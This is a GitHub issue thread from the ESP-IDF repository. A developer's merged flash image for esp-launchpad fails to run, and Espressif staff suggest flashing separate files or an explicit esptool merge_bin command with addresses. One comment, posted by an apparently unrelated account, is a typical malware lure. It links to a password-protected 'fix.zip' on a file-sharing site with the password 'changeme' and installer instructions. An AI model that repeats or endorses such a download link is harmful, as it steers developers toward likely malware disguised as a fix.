espressif/esp-idf #14445: Creating single Flash-able image from binary for esp-launchpad.

MR-VENOM, 2024-08-26:
### Answers checklist.

- [X] I have read the documentation [ESP-IDF Programming Guide](https://docs.espressif.com/projects/esp-idf/en/latest/) and the issue is not addressed there.
- [X] I have updated my IDF branch (master or release) to the latest version and checked that the issue is present there.
- [X] I have searched the issue tracker for a similar issue and not found a similar issue.

### General issue report

I wanted to create a single app image for my project the partitions table  is as follows

factory,  app,  factory,  0x010000,  4150K,
model,   data,  spiffs,   ,          3750K,
nvs,     data,  nvs,      ,          16K,
fr,      data,  ,         ,          128K,

I used the command esptool.py --chip $chip_id merge_bin -o $main.bin "@flash_args

But when the generated file is flashed  The program is not running properly. what should be done to fix this issue ?

2302114245, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

adwait-esp, 2024-08-27:
@MR-VENOM, did you tried flashing this same file with esptools.py? What address is this merged binary expected to be flashed at?

adwait-esp, 2024-12-17:
@MR-VENOM - is this issue solved for you? 
In the esp-launchpad there is also an option "DIY" to flash individual 4  files at respective 4 addresses i.e.
0x0 bootloader/bootloader.bin 
0x10000 ai-module.bin 
0x8000 partition_table/partition-table.bin 
0x41e000 srmodels/srmodels.bin

Have you tried selecting 4 different files and flashing instead?

MR-VENOM, 2024-12-17:
@adwait-esp  No the issue is not solved , yes i know about  DIY option for me i need to have single bin for production use case

adwait-esp, 2024-12-18:
@MR-VENOM Can you try below, this should ideally work.
esptool.py --chip esp32s3 merge_bin --flash_mode dio --flash_size 8MB --flash_freq 80m 0x0 bootloader/bootloader.bin 0x10000 ai-module.bin 0x8000 partition_table/partition-table.bin 0x41e000 srmodels/srmodels.bin -o merged.bin

Would it be possible for you to dump the contents of the flash_args file of yours?